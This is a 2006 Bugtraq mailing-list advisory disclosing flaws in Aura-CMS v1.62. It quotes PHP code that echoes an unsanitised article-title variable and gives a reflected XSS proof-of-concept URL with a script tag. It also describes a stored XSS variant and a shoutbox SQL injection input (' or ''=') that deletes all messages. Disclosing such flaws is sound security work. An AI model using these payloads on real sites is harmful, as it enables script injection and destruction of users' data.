Bugtraq mailing list archives
lintah_|adv|_01@2006>=========<[Aura-CMS v1.62]<===>[XSS vulnerable]&[bug]
From: "k07iX" <apem-zigzag () telkom net>
Date: Thu, 06 Jul 2006 21:23:23 +0700
by : iFX a.k.a inversFX _______________________________ [ apem-zigzag () telkom net ] [ inversfx () yahoo com ] ------------------------------- locate : Indonesia, Jakarta -------------------------------- date : 29/06/2006 -------------------------------- title : XSS on `CMS Aura v1.62` -------------------------------- Developer CMS : Arif Supriyanto - arif () ayo kliksini com http://www.auracms.tk http://www.semarang.tk http://www.ayo.kliksini.com http://www.auracms.opensource-indonesia.com -------------------------------- PoC : -------------------------------------------------------------------- 1. in 'teman.php' we can see the code : ..... echo "<p class=judul>Kirim ke Teman</p><p class=konten>Anda ingin memberitahu teman Anda tentang artikel ini yang berjudul
: <b>$judul_artikel</b>."; ..... we found something here, that's variable $judul_artikel so we can xss from the url : 1st ex:http://localhost/teman.php?judul_artikel=<script>alert("mati dah gwa!!!")</script>
2nd ex:or we can send an artikel to admin and the title had the XSS code, so when anonymous is
opening the index.php, the script are running. ---------------------------------------------------------------------2. we found something here that can be delete all shoutbox message. as usually we can shout anonymously with fake name, mail, pesan.
here when I insertname = ' or ''=' <== old SQL injection code mail = test_string <== you can fill it with free mail address
pesan = ' or ''=' <== old SQL injection codethen all message on it clear amazingly....
---------------------------------------------------------------------- screen shot : http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp origin : http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt ---------------------------------------------------------------------- sory for my words In English, cuz I often REMED!!! _________________/Shout :| |X|
-------------------------------------------------------------------------------------|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom kommunity, all hacker kommunity| |$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius, ||||||||. | |Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe, Shock-3d, G4mMa, Big_Red_One } |
------------------------------------------------------------------------------------- |OK | Apply | Cancel | ---------------------- ======================================================================================== Simak preview pertandingan piala dunia 2006 di http://telkom.net/pialadunia/Asah pengetahuanmu tentang Piala Dunia di http://netkuis.telkom.net/pialadunia/ ========================================================================================
Current thread:
- lintah_|adv|_01@2006>=========<[Aura-CMS v1.62]<===>[XSS vulnerable]&[bug] k07iX (Jul 07)